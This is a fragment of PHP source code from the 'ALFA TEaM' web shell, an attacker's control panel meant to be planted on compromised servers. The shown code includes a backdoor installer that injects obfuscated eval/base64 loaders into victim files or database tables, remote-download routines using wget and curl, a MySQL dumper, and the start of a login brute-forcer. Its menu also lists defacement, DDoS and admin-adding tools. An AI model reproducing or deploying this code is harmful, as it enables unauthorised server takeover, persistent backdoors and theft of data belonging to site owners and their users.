1784<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
1785</tr>';
1786if($GLOBALS['sys']=='unix'){
1787$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
1788if(!@ini_get('safe_mode')){
1789if(strlen(alfaEx("id",false,false))>0){
1790echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
1791$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
1792$x=0;
1793foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
1794if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1795echo '</td>
1796</tr>
1797<tr>
1798<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
1799$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1800$x=0;
1801foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
1802if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1803echo '</td>
1804</tr>';
1805}else{
1806echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1807}
1808}else{
1809echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1810}
1811}else{
1812echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
1813echo alfaEx('ver',false,false);
1814echo '</td>
1815</tr> <tr>
1816<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
1817</tr></b>';
1818}
1819$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
1820echo '<tr>
1821<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
1822</tr>
1823<tr>
1824<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
1825</tr>
1826<tr>
1827<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
1828</tr>
1829<tr>
1830<td height="11"><span class="header_vars">SoftWare: </span></td>
1831<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
1832</tr>';
1833if($GLOBALS['sys']=="win"){
1834echo '<tr>
1835<td height="12"><span class="header_vars">DRIVE:</span></td>
1836<td colspan="2"><b>'.$drives.'</b></td>
1837</tr>';
1838}
1839echo '<tr>
1840<td height="12"><span class="header_vars">PWD:</span></td>
1841<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
1842</tr>
1843</table>
1844</div>
1845<div id="meunlist">
1846<ul>
1847';
1848$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
1849'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
1850'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
1851'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
1852'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
1853);
1854foreach($li as $key=>$value){
1855echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
1856}
1857if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
1858echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
1859else
1860echo '</ul></div>';}else{
1861@error_reporting(E_ALL ^ E_NOTICE);
1862@ini_set('error_log',NULL);
1863@ini_set('log_errors',0);
1864@ini_set('max_execution_time',0);
1865@ini_set('magic_quotes_runtime', 0);
1866@set_time_limit(0);
1867}}
1868function alfalogout(){
1869unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
1870echo("<center><font color='red'>Logout...</font></center>");
1871}
1872function showAnimation($name){
1873 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
1874}
1875function __showicon($r){
1876 $s['btn']='http://solevisible.com/images/btn.png';
1877 $s['alfamini']='http://solevisible.com/images/alfamini.png';
1878 $s['loader']='http://solevisible.com/images/loader.png';
1879 //return 'data:image/png;base64,'.__get_resource($s[$r]);
1880 return $s[$r];
1881}
1882function alfainbackdoor(){
1883alfahead();
1884echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
1885$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
1886$success= '<font color="green">Success...!';
1887$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
1888$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
1889$cwd = 'Example: /home/alfa/public_html/index.php';
1890if($_POST['alfa1']=='file'){
1891echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
1892if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
1893$method = $_POST['alfa2'];
1894$file = $_POST['alfa3'];
1895$shell = $_POST['alfa4'];
1896$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
1897if($key=='')$key='alfa';
1898if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1899$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
1900if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
1901if($_POST['alfa1']=='db'){
1902echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
1903$table = array('td1' =>
1904array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1905'td2' =>
1906array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1907'td3' =>
1908array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1909'td4' =>
1910array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1911'td5' =>
1912array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
1913'td6' =>
1914array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
1915);
1916create_table($table);
1917echo("<p>{$select}</p>");
1918echo($textarea);
1919echo("<p><input type='submit' value=' '></p></form></p></center>");
1920if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
1921$dbhost = $_POST['alfa2'];
1922$dbuser = $_POST['alfa3'];
1923$dbpw = $_POST['alfa4'];
1924$dbname = $_POST['alfa5'];
1925$file = $_POST['alfa6'];
1926$method = $_POST['alfa7'];
1927$shell = $_POST['alfa8'];
1928$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
1929if($key=='')$key='alfa';
1930if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1931if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
1932$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
1933if(@is_file($file)&&@is_writable($file)){
1934@mysqli_query($conn,'DROP TABLE `alfa_bc`');
1935@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
1936@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
1937@file_put_contents($file,$code."\n".@file_get_contents($file));
1938__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
1939echo('</div>');
1940alfafooter();
1941}
1942function alfawhois(){
1943echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
1944if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
1945$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
1946$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
1947$data = @file_get_contents($target);
1948if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
1949$target = @json_decode($data,true);
1950echo __pre();
1951if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
1952echo("</div>");
1953}
1954function alfaremotedl(){
1955alfahead();
1956echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
1957<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
1958<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
1959<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
1960</form></p></center>");
1961if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
1962echo __pre();
1963$url = $_POST['alfa1'];
1964$path = $_POST['alfa2'];
1965echo('<center>');
1966if(__download($url,$path)){
1967echo('<font color="green">Success...!</font>');
1968}else{
1969echo('<font color="red">Error...!</font>');
1970}
1971echo('</center>');
1972}
1973echo("</div>");
1974alfafooter();
1975}
1976function __download($url,$path=false){
1977if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
1978$saveas = basename(rawurldecode($url));
1979if($path){$saveas=$path.$saveas;}
1980if($content = __read_file($url)){
1981if(@is_file($saveas))@unlink($saveas);
1982if(__write_file($saveas, $content)){return true;}}
1983$buff = alfaEx("wget ".$url." -O ".$saveas);
1984if(@is_file($saveas)) return true;
1985$buff = alfaEx("curl ".$url." -o ".$saveas);
1986if(@is_file($saveas)) return true;
1987$buff = alfaEx("lwp-download ".$url." ".$saveas);
1988if(@is_file($saveas)) return true;
1989$buff = alfaEx("lynx -source ".$url." > ".$saveas);
1990if(@is_file($saveas)) return true;
1991$buff = alfaEx("GET ".$url." > ".$saveas);
1992if(@is_file($saveas)) return true;
1993$buff = alfaEx("links -source ".$url." > ".$saveas);
1994if(@is_file($saveas)) return true;
1995$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
1996if(@is_file($saveas)) return true;
1997return false;
1998}
1999function clean_string($string){
2000 if(function_exists("iconv")){
2001 $s = trim($string);
2002 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
2003 }
2004 return $s;
2005}
2006function __read_file($file, $boom = true){
2007$content = false;
2008if($fh = @fopen($file, "rb")){
2009$content = "";
2010while(!feof($fh)){
2011$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
2012}
2013}
2014if(empty($content)||!$content){
2015 $content = alfaEx("cat '".addslashes($file)."'");
2016}
2017return $content;
2018}
2019function alfaSettings(){
2020alfahead();
2021AlfaNum(6,7,8,9,10);
2022echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
2023if($_POST["alfa8"] == "main"){
2024echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
2025$lg_array = array('0'=>'No','1'=>'Yes');
2026$penc_array = array('false'=>'No','true'=>'Yes');
2027$protect_html = "";
2028$icon_html = "";
2029$postEnc_html = "";
2030$login_html = "";
2031foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
2032foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
2033foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
2034$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
2035foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
2036echo '';
2037echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
2038if($_POST['alfa5']=='>>'){
2039echo __pre();
2040if(!empty($_POST['alfa3'])){
2041$protect = $_POST['alfa1'];
2042$lgpage = $_POST['alfa2'];
2043$username = $_POST['alfa3'];
2044$password = md5($_POST['alfa4']);
2045$icon = $_POST['alfa6'];
2046$post_encrypt = $_POST['alfa7'];
2047@chdir($GLOBALS['home_cwd']);
2048$basename = @basename($_SERVER['PHP_SELF']);
2049$data = @file_get_contents($basename);
2050$find_user = '/\'user\'(.*?),/i';
2051$find_pw = '/\'pass\'(.*?),/i';
2052$find_lg = '/\'login_page\'(.*?),/i';
2053$find_p = '/\'safemode\'(.*?),/i';
2054$icons = '/\'show_icons\'(.*?),/i';
2055$postEnc = '/\'post_encryption\'(.*?),/i';
2056if(!empty($username)&&preg_match($find_user,$data,$e)){
2057$new = '\'user\' => \''.$username.'\',';
2058$data = str_replace($e[0],$new,$data);
2059}
2060if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
2061$new = '\'pass\' => \''.$password.'\',';
2062$data = str_replace($e[0],$new,$data);
2063}
2064if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
2065$new = '\'login_page\' => \''.$lgpage.'\',';
2066$data = str_replace($e[0],$new,$data);
2067}
2068if(!empty($find_p)&&preg_match($find_p,$data,$e)){
2069$new = '\'safemode\' => \''.$protect.'\',';
2070$data = str_replace($e[0],$new,$data);
2071}
2072if(preg_match($icons,$data,$e)){
2073$new = '\'show_icons\' => \''.$icon.'\',';
2074$data = str_replace($e[0],$new,$data);
2075}
2076if(preg_match($postEnc,$data,$e)){
2077$new = '\'post_encryption\' => '.$post_encrypt.',';
2078$data = str_replace($e[0],$new,$data);
2079}
2080if(@file_put_contents($basename,$data)){
2081echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
2082}else{
2083__alert("<span style='color:red;'>File has no edit access...!</span>");
2084}
2085}else{
2086__alert("<span style='color:red;'>UserName is Empty !</span>");
2087}
2088}
2089}elseif($_POST["alfa8"] == "color"){
2090echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
2091echo '<table border="1"><tbody>';
2092$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
2093$x = 1;
2094foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
2095 $multi = "";
2096 if(is_array($value)){
2097 if(isset($value["multi_selector"])){
2098 $multi = __ZW5jb2Rlcg(json_encode($value));
2099 }
2100 }
2101 $value = alfa_getColor($key);
2102 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
2103 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
2104}
2105echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
2106
2107echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
2108if($_POST['alfa7']=='export'){
2109 echo __pre();
2110 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
2111 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2112 $array = array();
2113 foreach($glob_colors as $k => $v){
2114 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2115 $v = trim($colors[$k]);
2116 }else{
2117 $v = trim(is_array($v)?$v["key_color"]:$v);
2118 }
2119 $array[$k] = $v;
2120 }
2121 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
2122 $config = json_encode($array, JSON_PRETTY_PRINT);
2123 if(!@file_put_contents($file, $config)){
2124 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
2125 }else{
2126 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
2127 }
2128}
2129if($_POST['alfa2']=='>>'){
2130 echo __pre();
2131 $colors = json_decode($_POST["alfa1"],true);
2132 $array = "";
2133 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
2134 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2135 foreach($glob_colors as $k => $v){
2136 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2137 $v = trim($colors[$k]);
2138 }else{
2139 $v = trim(is_array($v)?$v["key_color"]:$v);
2140 }
2141 $array .= '"'.trim($k).'" => "'.$v.'",';
2142 }
2143 @chdir($GLOBALS['home_cwd']);
2144 $basename = @basename($_SERVER['PHP_SELF']);
2145 $data = @file_get_contents($basename);
2146 $color = '/\'color\'(.*?)\),/s';
2147 if(preg_match($color,$data,$e)){
2148 $new = "'color' => array(".$array."),";
2149 $data = str_replace($e[0],$new,$data);
2150 if(@file_put_contents($basename, $data)){
2151 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
2152 }else{
2153 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
2154 }
2155 }else{
2156 echo("<center><p><h3>[-] Error...!</h3></p></center>");
2157 }
2158}
2159}
2160echo('</div>');
2161alfafooter();
2162}
2163function alfaplus(){
2164alfahead();
2165echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
2166if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
2167try{
2168$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
2169$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
2170$news = new AlfaCURL();
2171if($news->Send($s1)){
2172$xml = $news->Send($s1);
2173}else{
2174$xml = false;
2175}
2176if($xml){
2177if(@simplexml_load_string($xml)){
2178$doc = new DOMDocument;
2179$doc->loadXML($xml);
2180$data = $doc->getElementsByTagName('data')->item(0);
2181$items = $data->getElementsByTagName('item');
2182foreach($items as $item){
2183$title = $item->getElementsByTagName('title')->item(0)->nodeValue;
2184$description = $item->getElementsByTagName('description')->item(0)->nodeValue;
2185$link = $item->getElementsByTagName('link')->item(0)->nodeValue;
2186$pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
2187echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
2188}
2189}else{
2190echo($msg);
2191}
2192}else{
2193echo($msg);
2194}
2195}catch(Exception $e){
2196echo $e->getMessage();
2197}}elseif($_POST['alfa1']=='about'){
2198echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
2199<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
2200<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
2201<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
2202<font color='#00A220'>Telegram Channel: @solevisible</font><br>
2203<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
2204<font color='#FFFFFF'>Skype : sole.sad</font><br>
2205<font color='#FF0000'>Persian Gulf For Ever</font><br>
2206<font color='#FF0000'>Iranian Hackers :)</font><br>
2207<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
2208</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
2209}
2210echo('</div>');
2211alfafooter();
2212}
2213function alfaDumper(){
2214alfahead();
2215echo('<div class="header">');
2216AlfaNum(8,9,10);
2217echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
2218$table = array('td1' =>
2219 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2220 'td2' =>
2221 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2222 'td3' =>
2223 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2224 'td4' =>
2225 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2226 'td5' =>
2227 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
2228);
2229create_table($table);
2230echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2231$username = ($_POST['alfa3']);
2232$password = ($_POST['alfa4']);
2233$dbname = ($_POST['alfa5']);
2234$dfile = ($_POST['alfa6']);
2235$host = ($_POST['alfa7']);
2236if(!empty($dbname)){
2237echo __pre();
2238$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
2239if(@mysqli_connect($host,$username,$password,$dbname)){
2240if(strlen(alfaEx("mysqldump"))>0){
2241alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
2242echo($msg);
2243}else{
2244__alert("Error...!");
2245}
2246}else{
2247echo('<center>mysqli_connect : Error!</center>');
2248}
2249}
2250echo('</div>');
2251alfafooter();
2252}
2253function Alfa_DirectAdmin_Cracker($info){
2254if(!$info['mysql'])
2255$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
2256else $url = $info['protocol'].$info['target'].'/phpmyadmin';
2257$curl = curl_init();
2258curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2259curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2260curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2261curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2262curl_setopt($curl, CURLOPT_HEADER,0);
2263curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2264curl_setopt($curl, CURLOPT_URL,$url);
2265curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
